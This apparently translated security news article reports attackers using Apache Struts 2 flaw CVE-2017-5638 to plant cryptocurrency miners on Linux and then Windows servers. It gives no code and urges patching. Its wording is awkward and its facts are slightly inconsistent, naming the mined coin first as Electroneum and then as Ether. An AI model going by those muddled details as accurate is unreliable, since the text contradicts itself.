Hackers used Apache Struts2 vulnerabilities for mining, but the target is Windows system

F5 Networks issued a statement last Wednesday that they have been tracking malicious activity initiated with the Apache Struts 2 Remote Code Execution (RCE) vulnerability CVE-2017-5638 since July 2017. In the initial activities, the attacker mainly used this vulnerability to infect the Struts framework running on the Linux operating system in order to tap the Electroneum (ETN) cryptocurrency.

Over time, the attackers seem to have decided to expand their mining operations to new goals. In the latest event, F5 Networks researchers found that mining activities using CVE-2017-5638 are still underway. Although the ultimate goal is still to mine Ether, the scope of attacks has been extended to Windows systems, not just Linux system.

Apache Struts is an open source project maintained by the Apache Software Foundation and is an open source MVC framework for creating enterprise Java web applications.

Vulnerability CVE-2017-5638 is a vulnerability publicly disclosed in March 2017 that affects all versions of Struts 2.3.5 to Struts 2.3.31 and Struts 2.5 to Struts 2.5.10, performing file uploads based on the Jakarta Multipart parser, when an attacker passes a malicious Content-Type value, it can cause remote code execution.

In the initial activities, the attacker infused the Linux shell payload by using the “wget” and “curl” tools built into the Linux system to download the mining malware and add it as a persistent “cron” task.

In mid-March 2018, F5 Networks researchers observed that recent activities have changed, with the injected payload changed to Struts Server for Windows-based systems.

F5 Networks believes that cryptocurrency mining activities are now becoming more and more popular because of their profitability, although it seems that the organizers of this mining activity appear to have made major mistakes in decision-making. However, it is still confirmed how important it is to install security patches for publicly disclosed vulnerabilities. For example, to avoid becoming a profit-making tool for others, patching Apache Struts 2 vulnerabilities and deploying firewall policies is a matter that should be completed as quickly as possible.